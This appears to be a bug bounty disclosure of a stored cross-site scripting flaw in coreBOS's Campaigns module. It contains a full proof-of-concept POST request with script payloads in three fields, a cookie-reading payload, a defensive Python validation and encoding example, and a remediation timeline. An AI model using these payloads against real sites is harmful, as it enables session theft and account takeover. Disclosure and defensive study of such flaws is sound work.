Cross-site Scripting (XSS) - Stored in tsolucio/corebos

Status: Valid

Reported on Dec 17th 2021

Description

coreBOS is vulnerable to Stored Cross-Site Scripting in the Campaign Type, Campaign Status and Expected Response fields of the Campaigns module (the campaigntype, campaignstatus and expectedresponse parameters in the request below). Script tags submitted in these fields are saved with the record and rendered back to any user who views it.

Request

POST /index.php HTTP/1.1
Host: demo.corebos.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1374125012794036086279201745
Content-Length: 5630
Cookie: democoreboscom=86b8cecae7a5f8d1e2fa41116a7e1ffc; ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=5443767136630943

-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="__vt5rftk"

sid:8d924f3e290e596062c746c014dd15397aae2871,1639753607
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="MAX_FILE_SIZE"

3000000
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="pagenumber"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="module"

Campaigns
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="record"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="mode"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="action"

Save
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="saverepeat"

0
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="return_module"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="return_id"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="return_action"

DetailView
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="return_viewname"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="createmode"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="cbcustominfo1"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="cbcustominfo2"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="Module_Popup_Edit"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="Module_Popup_Save"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="Module_Popup_Save_Param"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="FILTERFIELDSMAP"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="search_url"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="campaignname"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="campaign_no"

AUTO GEN ON SAVE
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="assigntype"

U
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="assigned_user_id"

1
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="assigned_group_id"

3
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="campaignstatus"

<script>alert(1)</script>
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="campaigntype"

<script>alert(2)</script>
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="product_id_type"

Products
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="product_id"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="product_id_display"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="targetaudience"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="closingdate"

-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="sponsor"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="targetsize"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="numsent"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="budgetcost"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="actualcost"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="expectedresponse"

<script>alert(4)</script>
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="expectedrevenue"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="expectedsalescount"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="actualsalescount"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="expectedresponsecount"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="actualresponsecount"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="expectedroi"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="actualroi"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="description"


-----------------------------1374125012794036086279201745--

Payload

<script>alert(document.cookie)</script>

Impact

This vulnerability can be used to steal users' cookies and achieve full account takeover with their credentials.
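The three fields named in the report are ordinary picklist and text fields, so two server-side controls close this class of bug: reject picklist values that are not in the allowed set, and HTML-encode every stored value before it is written into the page. The following is an added example, not coreBOS code: it parses a trimmed, constructed copy of the multipart body shown in the request above, flags the out-of-allowlist picklist values, and renders the record with output encoding so that the stored payload is shown as text rather than executed. The picklist values in PICKLISTS are assumed for illustration; a real deployment would read them from its own picklist configuration.

```python
import html
import re

# Constructed sample: a trimmed copy of the multipart body from the report,
# keeping the three flagged fields plus one benign field. The body delimiter
# is "--" followed by the boundary value from the Content-Type header.
BOUNDARY = "---------------------------1374125012794036086279201745"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="campaignname"\r\n\r\n'
    "Winter launch\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="campaignstatus"\r\n\r\n'
    "<script>alert(1)</script>\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="campaigntype"\r\n\r\n'
    "<script>alert(2)</script>\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="expectedresponse"\r\n\r\n'
    "<script>alert(4)</script>\r\n"
    f"--{BOUNDARY}--\r\n"
)

# Assumed allowlists for the two picklist fields (constructed for this example).
PICKLISTS = {
    "campaignstatus": {"Planning", "Active", "Inactive", "Complete", "Cancelled"},
    "campaigntype": {"Conference", "Webinar", "Trade Show", "Public Relations", "Telemarketing"},
}


def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser for text fields: returns {name: value}."""
    fields = {}
    for part in body.split(f"--{boundary}"):
        # Each inner part is wrapped in CRLF; the closing delimiter leaves "--".
        if part.startswith("\r\n"):
            part = part[2:]
        if part.endswith("\r\n"):
            part = part[:-2]
        if part in ("", "--"):
            continue
        headers, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]+)"', headers)
        if match:
            fields[match.group(1)] = value
    return fields


def validate_picklists(fields: dict) -> list:
    """Names of picklist fields whose submitted value is not in the allowlist."""
    return [name for name, allowed in PICKLISTS.items()
            if name in fields and fields[name] not in allowed]


def render_field(value: str) -> str:
    """HTML-encode a stored value before placing it in HTML text or attributes."""
    return html.escape(value, quote=True)


def render_campaign(fields: dict) -> str:
    """Render the record as an HTML table with every value output-encoded."""
    rows = "".join(
        f"<tr><td>{html.escape(name)}</td><td>{render_field(value)}</td></tr>"
        for name, value in fields.items()
    )
    return f"<table>{rows}</table>"


if __name__ == "__main__":
    submitted = parse_multipart(SAMPLE_BODY, BOUNDARY)
    print("rejected picklist fields:", validate_picklists(submitted))
    print(render_campaign(submitted))
```

Allowlist validation alone is not enough, because expectedresponse is free text and legitimately accepts arbitrary strings; the encoding step in render_field is what guarantees that a stored payload is displayed literally wherever the record is viewed.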

Timeline

We are processing your report and will contact the tsolucio/corebos team within 24 hours. (a year ago)
Muhammad Adel submitted a (a year ago)
We have contacted a member of the tsolucio/corebos team and are waiting to hear back. (a year ago)
Joe Bordes validated this vulnerability. (a year ago)
Muhammad Adel has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
Joe Bordes marked this as fixed in 8.0 with commit 4d4ba6. (a year ago)
Joe Bordes has been awarded the fix bounty.
This vulnerability will not receive a CVE.
42P2_to_50.php#L2883-L2901 has been validated.
Muhammad Adel (Researcher), a year ago:

Thanks for your quick validation. Just a note: this report contains XSS in three different places and was issued the same amount of bounty as if it were one. I am seeing some people reporting every vulnerability separately; should I do this as well?

Thanks again,
